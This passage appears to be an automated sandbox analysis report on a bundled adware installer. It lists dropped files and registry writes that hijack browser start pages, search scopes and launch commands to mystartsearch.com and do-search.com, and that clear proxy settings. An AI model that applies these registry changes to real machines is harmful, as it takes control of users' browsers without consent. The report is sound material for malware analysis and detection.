C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isC1A7..dll (15945 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\~BDF4.tmp (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isC206.tmp (668 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\USU4CORO\MyPDFConverter[1].msi (3239144 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isC345.tmp (77 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\~C344.tmp (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isC186.tmp (672 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\{C0C9B04E-6F25-4BB0-B132-E21F7C556C18}\Windows Installer 3.1 for Windows Server 2003 SP1 (x86).prq (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isC216..dll (15945 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\~BE15.tmp (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isBE27.tmp (705 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isC284.tmp (647 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isC1A6.tmp (671 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\{C0C9B04E-6F25-4BB0-B132-E21F7C556C18}\_ISMSIDEL.INI (31310 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\{C0C9B04E-6F25-4BB0-B132-E21F7C556C18}\Windows Installer 3.1 for Windows XP (x64).prq (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\{C0C9B04E-6F25-4BB0-B132-E21F7C556C18}\Setup.INI (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\{C0C9B04E-6F25-4BB0-B132-E21F7C556C18}\0x0409.ini (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isBFBE.tmp (692 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isBDF5.tmp (77 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isBFDF.tmp (667 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isBE57..dll (15945 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isBFEF..dll (15945 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isBD94.tmp (77 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isBE16.tmp (77 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\{C0C9B04E-6F25-4BB0-B132-E21F7C556C18}\Windows Installer 3.1 for Windows Server 2003 SP1 (x64).prq (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isC333.tmp (77 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\{C0C9B04E-6F25-4BB0-B132-E21F7C556C18}\MyPDFConverter.msi (88453 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\{C0C9B04E-6F25-4BB0-B132-E21F7C556C18}\Windows Imaging Component (x64).prq (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isC295..dll (15945 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\~C332.tmp (10 bytes)

The process firsttime_setup.exe:3488 makes changes in the file system.
The Application creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsvF068.tmp (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\uninstall\firsttime_uninstall.exe (1568 bytes)

The process MSIEXEC.EXE:3852 makes changes in the file system.
The Application creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\MSI2648.tmp (3073 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\MSI6B2B.tmp (3073 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\MSI605F.tmp (1281 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7B8944BA8AD0EFDF0E01A43EF62BECD0_0B392C5099259E005752375141B9C59A (1504 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 (56 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7B8944BA8AD0EFDF0E01A43EF62BECD0_0B392C5099259E005752375141B9C59A (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\MSI373A.tmp (3073 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\MSI5FD2.tmp (3073 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6 (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6 (1212 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\MSI485.tmp (3073 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\MSI5FB2.tmp (3073 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 (370 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Cab290.tmp (56 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Tar291.tmp (2784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\MSI6A40.tmp (3073 bytes)

Registry activity

The process BaofengUpdate.exe:3600 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKCU\Software\Mozilla\Extends]
"AppID" = "[email protected]"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope" = "{33BB0A4E-99AF-4226-BDF6-49120163DE86}"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN]
"Search Page" = "http://www.mystartsearch.com/web/?type=ds&ts=1422513759&from=smt&uid=535559167_132775_B48A115F&q={searchTerms}"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}]
"URL" = "http://www.mystartsearch.com/web/?type=ds&ts=1422513759&from=smt&uid=535559167_132775_B48A115F&q={searchTerms}"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN]
"Default_Search_URL" = "http://www.mystartsearch.com/web/?type=ds&ts=1422513759&from=smt&uid=535559167_132775_B48A115F&q={searchTerms}"

[HKLM\SOFTWARE\Clients\StartMenuInternet\FIREFOX.EXE\shell\open\command]
"(Default)" = "%Program Files% (x86)\Mozilla Firefox\firefox.exe http://www.mystartsearch.com/?type=sc&ts=1422513759&from=smt&uid=535559167_132775_B48A115F"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\mystartsearch uninstall]
"DisplayName" = "mystartsearch uninstall"

[HKCU\Software\Classes\Local Settings\MuiCache\2B\52C64B7E\@""%windir%\System32]
"ie4uinit.exe"",-738" = "Start Internet Explorer without ActiveX controls or browser extensions."

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}]
"DisplayName" = "mystartsearch"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}]
"URL" = "http://www.mystartsearch.com/web/?type=ds&ts=1422513759&from=smt&uid=535559167_132775_B48A115F&q={searchTerms}"

[HKCU\Software\Mozilla\Extends]
"UID" = "535559167_132775_B48A115F"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN]
"Start Page" = "http://www.mystartsearch.com/?type=hp&ts=1422513759&from=smt&uid=535559167_132775_B48A115F"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main]
"Default_Search_URL" = "http://www.mystartsearch.com/web/?type=ds&ts=1422513759&from=smt&uid=535559167_132775_B48A115F&q={searchTerms}"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN]
"Default_Page_URL" = "http://www.mystartsearch.com/?type=hp&ts=1422513759&from=smt&uid=535559167_132775_B48A115F"

[HKLM\SOFTWARE\Clients\StartMenuInternet\VMWAREHOSTOPEN.EXE\shell\open\command]
"(Default)" = "%Program Files%\VMware\VMware Tools\VMwareHostOpen.exe http://www.mystartsearch.com/?type=sc&ts=1422513759&from=smt&uid=535559167_132775_B48A115F"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\mystartsearch uninstall]
"UninstallString" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\UninstallManager.exe -ptid=smt"

[HKLM\SOFTWARE\Wow6432Node\mystartsearchSoftware\mystartsearchhp]
"Time" = "Type: REG_QWORD, Length: 8"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Google Chrome\shell\open\command]
"(Default)" = "%Program Files% (x86)\Google\Chrome\Application\chrome.exe http://www.mystartsearch.com/?type=sc&ts=1422513759&from=smt&uid=535559167_132775_B48A115F"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope" = "{33BB0A4E-99AF-4226-BDF6-49120163DE86}"

[HKCU\Software\Classes\Local Settings\MuiCache\2B\52C64B7E]
"LanguageList" = "en-US, en"

[HKLM\SOFTWARE\Clients\StartMenuInternet\IEXPLORE.EXE\shell\open\command]
"(Default)" = "%Program Files%\Internet Explorer\iexplore.exe http://www.mystartsearch.com/?type=sc&ts=1422513759&from=smt&uid=535559167_132775_B48A115F"

[HKLM\SOFTWARE\Wow6432Node\mystartsearchSoftware\mystartsearchhp]
"oem" = "smt"

[HKCU\Software\Microsoft\Internet Explorer\TabbedBrowsing]
"NewTabPageShow" = "1"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main]
"Start Page" = "http://www.mystartsearch.com/?type=hp&ts=1422513759&from=smt&uid=535559167_132775_B48A115F"
"Search Page" = "http://www.mystartsearch.com/web/?type=ds&ts=1422513759&from=smt&uid=535559167_132775_B48A115F&q={searchTerms}"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Default_Page_URL" = "http://www.mystartsearch.com/?type=hp&ts=1422513759&from=smt&uid=535559167_132775_B48A115F"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\mystartsearch uninstall]
"Publisher" = "mystartsearch"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}]
"URL" = "http://www.mystartsearch.com/web/?type=ds&ts=1422513759&from=smt&uid=535559167_132775_B48A115F&q={searchTerms}"
"DisplayName" = "mystartsearch"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "http://www.mystartsearch.com/?type=hp&ts=1422513759&from=smt&uid=535559167_132775_B48A115F"

[HKCU\Software\Mozilla\Extends]
"ptid" = "smt"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope" = "{33BB0A4E-99AF-4226-BDF6-49120163DE86}"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main]
"Default_Page_URL" = "http://www.mystartsearch.com/?type=hp&ts=1422513759&from=smt&uid=535559167_132775_B48A115F"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\mystartsearch uninstall]
"DisplayIcon" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\UninstallManager.exe氀IJ"

[HKCU\Software\Classes\Local Settings\MuiCache\2B\52C64B7E\@""%systemroot%\system32\windowspowershell\v1.0]
"powershell.exe"",-111" = "Performs object-based (command-line) functions"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}]
"DisplayName" = "mystartsearch"

[HKLM\SOFTWARE\Wow6432Node\Mozilla\Firefox\Extensions]
"[email protected]" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]"

The process BaofengUpdate.exe:3212 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Application deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process D79A.tmp:2264 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecision" = "0"
"WpadDecisionTime" = "86 83 0B D9 8E 3B D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadNetworkName" = "Network"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDetectedUrl" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 41 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDecision" = "0"
"WpadDecisionTime" = "11 F7 16 DC 8E 3B D0 01"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Application deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDetectedUrl"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoDetect"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDetectedUrl"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process XTab_v4.0.exe:3152 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKCR\TypeLib\{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}\1.0\HELPDIR]
"(Default)" = "%Program Files% (x86)\XTab"

[HKLM\SOFTWARE\Wow6432Node\supTab]
"ptid" = "smt"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E733165D-CBCF-4FDA-883E-ADEF965B476C}]
"URL" = "http://do-search.com/web/?utm_source=b&utm_medium=&utm_campaign=install_ie&utm_content=ds&from=&uid=ST500DM002-1BC142_W2A27G6AXXXXW2A27G6A&ts=1420373293&type=default&q={searchTerms}"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"TopResultURL" = "http://www.bing.com/search?q={searchTerms}&src=IE-TopResult&FORM=IETR02"
"URL" = "http://do-search.com/web/?utm_source=b&utm_medium=&utm_campaign=install_ie&utm_content=ds&from=&uid=ST500DM002-1BC142_W2A27G6AXXXXW2A27G6A&ts=1420373293&type=default&q={searchTerms}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 42 00 00 00 09 00 00 00 00 00 00 00"

[HKCR\TypeLib\{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}\1.0]
"(Default)" = "SupTabLib"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"FaviconURL" = "http://www.bing.com/favicon.ico"

[HKCR\TypeLib\{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\TypeLib\{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}\1.0\0\win32]
"(Default)" = "%Program Files% (x86)\XTab\SupTab.dll"

[HKCR\Wow6432Node\CLSID\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}]
"(Default)" = "IETabPage Class"

[HKCR\Wow6432Node\CLSID\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}\TypeLib]
"(Default)" = "{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}"

[HKCR\Wow6432Node\CLSID\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}\InprocServer32]
"(Default)" = "%Program Files% (x86)\XTab\SupTab.dll"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}]
"URL" = "http://do-search.com/web/?utm_source=b&utm_medium=&utm_campaign=install_ie&utm_content=ds&from=&uid=ST500DM002-1BC142_W2A27G6AXXXXW2A27G6A&ts=1420373293&type=default&q={searchTerms}"

[HKCR\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}]
"(Default)" = "IIETabPage"

[HKCR\Wow6432Node\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}\TypeLib]
"Version" = "1.0"

[HKCR\Wow6432Node\CLSID\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}\Version]
"(Default)" = "1.0"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"FaviconPath" = "C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico"
"DisplayName" = "Bing"

[HKCR\Wow6432Node\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}\TypeLib]
"(Default)" = "{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E733165D-CBCF-4FDA-883E-ADEF965B476C}]
"FaviconURL" = "http://www.google.com/favicon.ico"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope" = "{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}"

[HKLM\SOFTWARE\Wow6432Node\SupDp]
"dir" = "%Program Files% (x86)\XTab"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}]
"FaviconURL" = "http://do-search.com//favicon.ico"

[HKCR\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}\TypeLib]
"(Default)" = "{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}"

[HKCU\Software\Microsoft\Internet Explorer\TabbedBrowsing]
"NewTabPageShow" = "0"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}]
"URL" = "http://do-search.com/web/?utm_source=b&utm_medium=&utm_campaign=install_ie&utm_content=ds&from=&uid=ST500DM002-1BC142_W2A27G6AXXXXW2A27G6A&ts=1420373293&type=default&q={searchTerms}"

[HKCR\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Wow6432Node\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}]
"(Default)" = "IIETabPage"

[HKCR\Wow6432Node\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}\TypeLib]
"Version" = "1.0"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}]
"FaviconPath" = "C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}.ico"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E733165D-CBCF-4FDA-883E-ADEF965B476C}]
"TopResultURL" = "http://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:{language}:{referrer:source}&ie={inputEncoding?}&oe={outputEncoding?}"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}]
"TopResultURL" = "http://www.mystartsearch.com/web/?type=ds&ts=1422513759&from=smt&uid=535559167_132775_B48A115F&q={searchTerms}"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"FaviconURLFallback" = "http://www.bing.com/favicon.ico"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E733165D-CBCF-4FDA-883E-ADEF965B476C}]
"DisplayName" = "Google"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}]
"DisplayName" = "e"

[HKCR\Wow6432Node\CLSID\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E733165D-CBCF-4FDA-883E-ADEF965B476C}]
"FaviconPath" = "C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{E733165D-CBCF-4FDA-883E-ADEF965B476C}.ico"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Application deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
"AutoDetect"

The process smt_mystartsearch.exe:3356 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecision" = "0"
"WpadDecisionTime" = "3D 95 9D 8F 8E 3B D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadNetworkName" = "Network"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\VMwareDnD\31ec1c24\PUPautoinsaller_v1.exe, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\VMwareDnD\31ec1c24\, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\VMwareDnD\6c88b866\python.dll, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\VMwareDnD\6c88b866\, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\biclient.exe, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\422.json,"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDetectedUrl" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3E 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDecision" = "0"
"WpadDecisionTime" = "E0 D1 59 A4 8E 3B D0 01"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Application deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDetectedUrl"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoDetect"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDetectedUrl"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process trayapp_setup.gen:1992 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKCU\Software\Genieo\Components\TrayApp\Personalization Tray Application\Components]
"Main" = "1"

[HKCU\Software\Genieo\Components\TrayApp\Personalization Tray Application]
"Path" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application"

The process ProtectService.exe:3120 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 45 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Wow6432Node\IHProtect]
"ptid" = "smt"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Application deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
"AutoDetect"

The process ProtectService.exe:3188 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 04 00 00 00 09 00 00 00 00 00 00 00"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Application deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoDetect"
"AutoConfigURL"
"ProxyServer"

The process Setup.exe:4008 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Wow6432Node\GPL Ghostscript\8.15]
"GS_DLL" = "%Program Files% (x86)\GPLGS\gsdll32.dll"
"GS_LIB" = "%Program Files% (x86)\GPLGS"

The process Setup.exe:468 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyPDF Converter]
"UninstallString" = "%Program Files% (x86)\MyPDFConverter\unInstpw64.exe /uninstall"

